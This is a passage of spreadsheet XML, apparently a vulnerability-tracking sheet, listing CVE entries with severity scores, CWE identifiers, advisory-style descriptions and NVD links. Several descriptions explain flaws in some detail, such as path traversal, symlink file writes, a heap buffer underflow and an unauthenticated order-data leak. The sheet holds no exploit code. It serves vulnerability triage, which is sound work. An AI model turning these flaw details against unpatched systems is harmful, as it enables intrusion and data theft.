      </c>
      <c r="G3803" s="5" t="inlineStr"/>
      <c r="H3803" s="5" t="inlineStr"/>
      <c r="I3803" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3803" s="5" t="inlineStr"/>
      <c r="K3803" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3803" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed a path traversal vulnerability in Tanium Data Service.</t>
        </is>
      </c>
      <c r="M3803" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14505</t>
        </is>
      </c>
    </row>
    <row r="3804">
      <c r="A3804" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3804" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19201</t>
        </is>
      </c>
      <c r="C3804" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3804" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3804" s="5" t="inlineStr"/>
      <c r="F3804" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3804" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3804" s="5" t="inlineStr"/>
      <c r="I3804" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3804" s="5" t="inlineStr"/>
      <c r="K3804" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L3804" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled recursion vulnerability in the Windows SIPA event log parser of Google go-attestation versions up to and including 0.6.1 allows an attacker to cause a denial of service (DoS). The (*WinEvents).readELAMAggregation function recurses for every nested elamAggregation sub-event without enforcing a maximum recursion depth limit, while the size guard is bypassed on recursive execution paths. By submitting a crafted Windows event log containing deeply nested elamAggregation headers, an attacker can exhaust the goroutine call stack, triggering an unrecoverable fatal runtime error (stack overflow) that immediately crashes the verifier application.</t>
        </is>
      </c>
      <c r="M3804" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19201</t>
        </is>
      </c>
    </row>
    <row r="3805">
      <c r="A3805" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3805" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45819</t>
        </is>
      </c>
      <c r="C3805" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3805" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3805" s="5" t="inlineStr"/>
      <c r="F3805" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3805" s="5" t="inlineStr"/>
      <c r="H3805" s="5" t="inlineStr"/>
      <c r="I3805" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3805" s="5" t="inlineStr"/>
      <c r="K3805" s="5" t="inlineStr">
        <is>
          <t>CWE-705, CWE-755</t>
        </is>
      </c>
      <c r="L3805" s="5" t="inlineStr">
        <is>
          <t>baseline-browser-mapping 2.x before 2.11.0 calls process.exit() instead of throwing on invalid or conflicting input parameters, and can trigger immediate process termination, causing denial of service.</t>
        </is>
      </c>
      <c r="M3805" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45819</t>
        </is>
      </c>
    </row>
    <row r="3806">
      <c r="A3806" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3806" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52486</t>
        </is>
      </c>
      <c r="C3806" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3806" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3806" s="5" t="inlineStr"/>
      <c r="F3806" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3806" s="5" t="inlineStr"/>
      <c r="H3806" s="5" t="inlineStr"/>
      <c r="I3806" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3806" s="5" t="inlineStr"/>
      <c r="K3806" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L3806" s="5" t="inlineStr">
        <is>
          <t>An issue in OpenDDS 3.33.x allows a local attacker to cause a denial of service via the verify function in the SIgnedDocument module</t>
        </is>
      </c>
      <c r="M3806" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52486</t>
        </is>
      </c>
    </row>
    <row r="3807">
      <c r="A3807" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3807" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55569</t>
        </is>
      </c>
      <c r="C3807" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3807" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3807" s="5" t="inlineStr"/>
      <c r="F3807" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3807" s="5" t="inlineStr"/>
      <c r="H3807" s="5" t="inlineStr"/>
      <c r="I3807" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="J3807" s="5" t="inlineStr"/>
      <c r="K3807" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="L3807" s="5" t="inlineStr">
        <is>
          <t>aqua is a declarative command-line version manager written in Go. Prior to 2.60.1, pkg/unarchive/archives.go in the handler.HandleFile method calls os.Symlink with archives.FileInfo.LinkTarget without verifying that the target remains under the extraction destination. A later regular-file entry at the same archive path is opened with OpenFile using O_CREATE and O_WRONLY, which follows the attacker-planted symlink. A malicious or compromised package archive can therefore write attacker-controlled bytes outside aqua's extraction directory with the privileges of the user running aqua, potentially overwriting shell startup files, tool configuration, or writable executable paths. This issue is fixed in version 2.60.1.</t>
        </is>
      </c>
      <c r="M3807" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55569</t>
        </is>
      </c>
    </row>
    <row r="3808">
      <c r="A3808" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3808" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69469</t>
        </is>
      </c>
      <c r="C3808" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3808" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3808" s="5" t="inlineStr"/>
      <c r="F3808" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3808" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3808" s="5" t="inlineStr"/>
      <c r="I3808" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3808" s="5" t="inlineStr"/>
      <c r="K3808" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L3808" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M3808" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t>
        </is>
      </c>
    </row>
    <row r="3809">
      <c r="A3809" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3809" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70593</t>
        </is>
      </c>
      <c r="C3809" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3809" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3809" s="5" t="inlineStr"/>
      <c r="F3809" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3809" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3809" s="5" t="inlineStr"/>
      <c r="I3809" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3809" s="5" t="inlineStr"/>
      <c r="K3809" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3809" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 0.10.0 until 6.54.1, a vulnerability in custom themes allowed a staff user to write files outside of the uploads directory. This could be used to alter the behavior of the installation through custom theme upload path traversal in LocalStorageBase and theme storage name handling. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M3809" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70593</t>
        </is>
      </c>
    </row>
    <row r="3810">
      <c r="A3810" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3810" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70602</t>
        </is>
      </c>
      <c r="C3810" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3810" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3810" s="5" t="inlineStr"/>
      <c r="F3810" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3810" s="5" t="inlineStr">
        <is>
          <t>windows, java</t>
        </is>
      </c>
      <c r="H3810" s="5" t="inlineStr"/>
      <c r="I3810" s="5" t="inlineStr">
        <is>
          <t>2026-08-05</t>
        </is>
      </c>
      <c r="J3810" s="5" t="inlineStr"/>
      <c r="K3810" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3810" s="5" t="inlineStr">
        <is>
          <t>Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3, extension tab and scripting APIs were not scoped to the extension's own session. A malicious or compromised extension loaded into one session could navigate, script, and read from windows belonging to a different session. Apps are only affected if they load Chrome extensions via session.loadExtension and rely on separate sessions to isolate that extension from other content. This issue is fixed in versions 39.8.8, 40.9.0, 41.2.1, and 42.0.0-beta.3.</t>
        </is>
      </c>
      <c r="M3810" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70602</t>
        </is>
      </c>
    </row>
    <row r="3811">
      <c r="A3811" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3811" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73433</t>
        </is>
      </c>
      <c r="C3811" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3811" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3811" s="5" t="inlineStr"/>
      <c r="F3811" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3811" s="5" t="inlineStr"/>
      <c r="H3811" s="5" t="inlineStr">
        <is>
          <t>gstreamer:gstreamer, redhat:enterprise_linux</t>
        </is>
      </c>
      <c r="I3811" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J3811" s="5" t="inlineStr"/>
      <c r="K3811" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="L3811" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GStreamer gst-plugins-good (avidemux). When parsing FUJIFILM metadata in an AVI strd chunk, gst_avi_demux_parse_strd() decrements a remaining-length counter by fixed offsets (98 and 10 bytes) without verifying sufficient data remains. For crafted strd payloads of exactly 106 or 107 bytes, the counter underflows to a very large unsigned value, causing subsequent null-terminated string scanning to read far beyond the allocated heap buffer. Date-format normalization may also write beyond the buffer end. Confirmed impacts include heap out-of-bounds read, out-of-bounds write, heap information disclosure (adjacent data appearing in parsed metadata), and application crash/denial of service. The avidemux element is auto-plugged by playbin, decodebin, and gst-discoverer, so opening or previewing a crafted AVI is sufficient to trigger the issue. Fixed upstream in gst-plugins-good 1.28.6 (GStreamer-SA-2026-0072).</t>
        </is>
      </c>
      <c r="M3811" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73433</t>
        </is>
      </c>
    </row>
    <row r="3812">
      <c r="A3812" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3812" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78545</t>
        </is>
      </c>
      <c r="C3812" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3812" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3812" s="5" t="inlineStr"/>
      <c r="F3812" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3812" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="H3812" s="5" t="inlineStr"/>
      <c r="I3812" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3812" s="5" t="inlineStr"/>
      <c r="K3812" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3812" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize the application label field before including it in the generated nginx configuration file. The unsanitized value is interpolated into an nginx server block directive, resulting in execution of injected directives.</t>
        </is>
      </c>
      <c r="M3812" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t>
        </is>
      </c>
    </row>
    <row r="3813">
      <c r="A3813" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3813" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78550</t>
        </is>
      </c>
      <c r="C3813" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3813" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3813" s="5" t="inlineStr"/>
      <c r="F3813" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3813" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H3813" s="5" t="inlineStr"/>
      <c r="I3813" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3813" s="5" t="inlineStr"/>
      <c r="K3813" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L3813" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway management console passes user-supplied input to eval() without sanitization during an authenticated administrator SSH session. As a result, the unsanitized input is executed directly, leading to code execution with the privileges of the management console.</t>
        </is>
      </c>
      <c r="M3813" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t>
        </is>
      </c>
    </row>
    <row r="3814">
      <c r="A3814" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3814" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81051</t>
        </is>
      </c>
      <c r="C3814" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3814" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3814" s="5" t="inlineStr"/>
      <c r="F3814" s="5" t="inlineStr"/>
      <c r="G3814" s="5" t="inlineStr"/>
      <c r="H3814" s="5" t="inlineStr"/>
      <c r="I3814" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J3814" s="5" t="inlineStr"/>
      <c r="K3814" s="5" t="inlineStr">
        <is>
          <t>CWE-1328</t>
        </is>
      </c>
      <c r="L3814" s="5" t="inlineStr">
        <is>
          <t>Dell ThinOS 10, versions prior to 2605_10.2616, contain a Security Version Number Mutable to Older Versions vulnerability. A low privileged attacker with physical access could potentially exploit this vulnerability, leading to Protection mechanism bypass.</t>
        </is>
      </c>
      <c r="M3814" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81051</t>
        </is>
      </c>
    </row>
    <row r="3815">
      <c r="A3815" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3815" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84898</t>
        </is>
      </c>
      <c r="C3815" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D3815" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3815" s="5" t="inlineStr"/>
      <c r="F3815" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3815" s="5" t="inlineStr"/>
      <c r="H3815" s="5" t="inlineStr"/>
      <c r="I3815" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3815" s="5" t="inlineStr"/>
      <c r="K3815" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3815" s="5" t="inlineStr">
        <is>
          <t>The Eventin  WordPress plugin before 4.1.21 does not properly validate a template path value before using it to include a local file, allowing users with contributor-level access and above to include and execute arbitrary local PHP files.</t>
        </is>
      </c>
      <c r="M3815" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84898</t>
        </is>
      </c>
    </row>
    <row r="3816">
      <c r="A3816" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3816" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-9355</t>
        </is>
      </c>
      <c r="C3816" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3816" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3816" s="5" t="inlineStr"/>
      <c r="F3816" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3816" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H3816" s="5" t="inlineStr"/>
      <c r="I3816" s="5" t="inlineStr">
        <is>
          <t>2024-10-01</t>
        </is>
      </c>
      <c r="J3816" s="5" t="inlineStr"/>
      <c r="K3816" s="5" t="inlineStr">
        <is>
          <t>CWE-457</t>
        </is>
      </c>
      <c r="L3816" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in Golang FIPS OpenSSL. This flaw allows a malicious user to randomly cause an uninitialized buffer length variable with a zeroed buffer to be returned in FIPS mode. It may also be possible to force a false positive match between non-equal hashes when comparing a trusted computed hmac sum to an untrusted input sum if an attacker can send a zeroed buffer in place of a pre-computed sum.  It is also possible to force a derived key to be all zeros instead of an unpredictable value.  This may have follow-on implications for the Go TLS stack.</t>
        </is>
      </c>
      <c r="M3816" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-9355</t>
        </is>
      </c>
    </row>
    <row r="3817">
      <c r="A3817" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3817" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-70340</t>
        </is>
      </c>
      <c r="C3817" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3817" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3817" s="5" t="inlineStr"/>
      <c r="F3817" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3817" s="5" t="inlineStr"/>
      <c r="H3817" s="5" t="inlineStr"/>
      <c r="I3817" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J3817" s="5" t="inlineStr"/>
      <c r="K3817" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L3817" s="5" t="inlineStr">
        <is>
          <t>A Broken Access Control vulnerability exists in ThingsBoard Professional Edition (PE) 4.21 and below, within the Alarms comments functionality. An authenticated customer user can manipulate the respective API request parameters to create or modify system-generated alarm comments. This allows unauthorized impersonation of system messages and modification of trusted system-owned data, resulting in vertical privilege escalation and potential integrity violations.</t>
        </is>
      </c>
      <c r="M3817" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-70340</t>
        </is>
      </c>
    </row>
    <row r="3818">
      <c r="A3818" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3818" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11496</t>
        </is>
      </c>
      <c r="C3818" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3818" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3818" s="5" t="inlineStr"/>
      <c r="F3818" s="5" t="inlineStr"/>
      <c r="G3818" s="5" t="inlineStr"/>
      <c r="H3818" s="5" t="inlineStr"/>
      <c r="I3818" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3818" s="5" t="inlineStr"/>
      <c r="K3818" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3818" s="5" t="inlineStr">
        <is>
          <t>The Woo PDF Invoice Builder plugin (also distributed as "PDF Builder for WooCommerce") for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.0.8. This is due to the InspectOrder() AJAX handler (woocommerce-pdf-invoice-ajax.php:513), registered on wp_ajax_rednao_wcpdfinv_inspect_order, performing no capability check and no nonce verification before loading an arbitrary order by the attacker-supplied 'OrderNumber' POST field and serializing its full WC_Order::get_data() and meta to the response. This makes it possible for authenticated attackers with Subscriber-level access and above to read every WooCommerce order on the site — including billing/shipping address, email, phone number, payment method, gateway transaction ID, and order totals — by iterating order IDs.</t>
        </is>
      </c>
      <c r="M3818" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11496</t>
        </is>
      </c>
    </row>
    <row r="3819">
      <c r="A3819" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3819" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12757</t>
        </is>
      </c>
      <c r="C3819" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3819" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3819" s="5" t="inlineStr"/>
      <c r="F3819" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3819" s="5" t="inlineStr"/>
      <c r="H3819" s="5" t="inlineStr"/>
      <c r="I3819" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3819" s="5" t="inlineStr"/>
      <c r="K3819" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L3819" s="5" t="inlineStr">
        <is>
          <t>The The Email Subscribers &amp; Newsletters – Email Marketing, Post Notifications &amp; Newsletter Plugin for WordPress plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.9.27. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.</t>
        </is>
      </c>
      <c r="M3819" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12757</t>
        </is>
      </c>
    </row>
    <row r="3820">
      <c r="A3820" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3820" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14470</t>
        </is>
      </c>
      <c r="C3820" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3820" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3820" s="5" t="inlineStr"/>
      <c r="F3820" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3820" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H3820" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I3820" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3820" s="5" t="inlineStr"/>
      <c r="K3820" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3820" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow an authenticated attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system.</t>
        </is>
      </c>
      <c r="M3820" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14470</t>
        </is>
      </c>
    </row>
    <row r="3821">
      <c r="A3821" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3821" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14975</t>
        </is>
      </c>
      <c r="C3821" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3821" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3821" s="5" t="inlineStr"/>
      <c r="F3821" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3821" s="5" t="inlineStr"/>
      <c r="H3821" s="5" t="inlineStr"/>
      <c r="I3821" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3821" s="5" t="inlineStr"/>
      <c r="K3821" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3821" s="5" t="inlineStr">
        <is>
          <t>The WP File Download plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 6.3.8 via the 'remoteurl' parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. An authenticated attacker with Subscriber-level access first poisons the _wpfd_file_metadata['file'] post-meta value via the unprotected file.save handler, after which the streaming endpoint — hooked on init with no authentication requirement — resolves and streams the traversed file path to any caller, including unauthenticated visitors.</t>
        </is>
      </c>
      <c r="M3821" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14975</t>
        </is>
      </c>
    </row>
    <row r="3822">
      <c r="A3822" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3822" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-15154</t>
        </is>
      </c>
      <c r="C3822" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3822" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3822" s="5" t="inlineStr"/>
      <c r="F3822" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3822" s="5" t="inlineStr">
        <is>
          <t>red hat</t>
        </is>
      </c>
      <c r="H3822" s="5" t="inlineStr">
        <is>
          <t>redhat:openshift_ai</t>
        </is>
      </c>
      <c r="I3822" s="5" t="inlineStr">
        <is>
          <t>2026-07-08</t>
        </is>
      </c>
      <c r="J3822" s="5" t="inlineStr"/>
      <c r="K3822" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L3822" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in `guardrails-detectors`, a component of Red Hat OpenShift AI. This vulnerability, known as Regular Expression Denial of Service (ReDoS), allows a remote attacker to provide specially crafted regular expressions to the public detection API. This can cause catastrophic backtracking, leading to a worker process consuming 100% CPU indefinitely and resulting in a denial of service for the entire guardrails-mediated LLM pipeline.</t>
        </is>
      </c>
      <c r="M3822" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-15154</t>
        </is>
      </c>
    </row>
    <row r="3823">
      <c r="A3823" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-16637</t>
        </is>
      </c>
      <c r="C3823" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="D3823" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3823" s="5" t="inlineStr"/>
      <c r="F3823" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3823" s="5" t="inlineStr"/>
      <c r="H3823" s="5" t="inlineStr"/>
      <c r="I3823" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3823" s="5" t="inlineStr"/>
      <c r="K3823" s="5" t="inlineStr">
        <is>
          <t>CWE-201, CWE-918</t>
        </is>
      </c>
      <c r="L3823" s="5" t="inlineStr">
        <is>
          <t>OPeNDAP Hyrax allows SSRF and credential disclosure via unvalidated HTTP redirects that bypass the AllowedHosts allowlist and leak Earthdata headers (User-Id, Echo-Token) to attacker-controlled endpoints.</t>
        </is>
      </c>
      <c r="M3823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-16637</t>
        </is>
      </c>
    </row>
    <row r="3824">
      <c r="A3824" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17259</t>
        </is>
      </c>
      <c r="C3824" s="5" t="n">
        <v>6.5</v>
      </c>
